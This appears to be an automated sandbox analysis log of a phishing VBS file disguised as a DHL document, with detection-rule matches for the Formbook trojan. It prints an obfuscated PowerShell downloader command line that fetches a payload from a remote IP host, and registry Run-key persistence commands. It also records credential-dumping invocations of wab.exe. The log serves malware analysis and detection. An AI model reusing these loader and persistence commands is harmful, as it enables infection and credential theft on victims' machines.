            Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6231
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6231
            Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 6007
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6007
            Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. 
Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00401806 NtdllDefWindowProc_W
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004018C0 NtdllDefWindowProc_W
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004016FD NtdllDefWindowProc_A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004017B7 NtdllDefWindowProc_A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00402CAC NtdllDefWindowProc_A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00402D66 NtdllDefWindowProc_A
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB35C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2B60 NtClose,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB3090 NtSetValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB3010 NtOpenDirectoryObject
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB4340 NtSetContextThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB4650 NtSuspendThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB39B0 NtGetContextThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BF0 NtAllocateVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BE0 NtQueryValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2BA0 NtEnumerateValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2B80 NtQueryInformationFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AF0 NtWriteFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AD0 NtReadFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_21FB2AB0 NtWaitForSingleObject
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 25_2_036E30EF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory
            Source: DHL_ES567436735845755676678877988975877.vbs Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: amsi64_2132.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_2668.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_5804.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_6324.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@54/18@7/6
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,16_2_004182CE
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,20_2_00410DE1
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,16_2_00418758
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,16_2_00413D4C
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,16_2_0040B58D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Presignal23.Hal
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3364:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\jnbcourg-8XH6PE
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey2gvbbt.de4.ps1
            Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2132
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2668
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5804
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6324
            Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wab.exe, wab.exe, 00000013.00000002.2507727722.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wab.exe, 00000008.00000002.3327479336.0000000022380000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wab.exe, 00000010.00000002.2534745022.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531984153.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2531046786.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2525034620.0000000004BC5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wab.exe, wab.exe, 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: DHL_ES567436735845755676678877988975877.vbs ReversingLabs: Detection: 34%
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33249
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
